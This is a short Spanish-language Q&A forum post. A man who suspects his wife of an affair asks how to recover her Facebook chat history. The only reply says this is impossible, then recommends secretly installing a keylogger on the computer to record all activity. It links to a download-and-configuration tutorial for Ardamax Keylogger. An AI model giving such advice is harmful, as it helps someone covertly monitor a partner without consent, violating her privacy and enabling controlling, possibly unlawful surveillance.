¿Cómo recuperar el historial en facebook?

Hola que tal. Tengo un problema, he pillado a mi mujer chateando a escodindas con un amigo común y se que hay algo entre ellos, ella me jura y me rejura que no, pero no me fio. Mi pregunta si es posible recuperar el historial de conversaciones del chat en facebook. Me harías un gran favor si me contestaras, gracias.

1 respuesta

Respuesta
No, no se puede, aunque puedes recurrir a programas logger, que registran todas las actividades realizadas en el computador que se instale.
Te remito a una fuente donde puedes descargarlo y configurarlo.
http://www.taringa.net/posts/downloads/3117806/Descarga-y-tutorial---ardamax-keylogger.html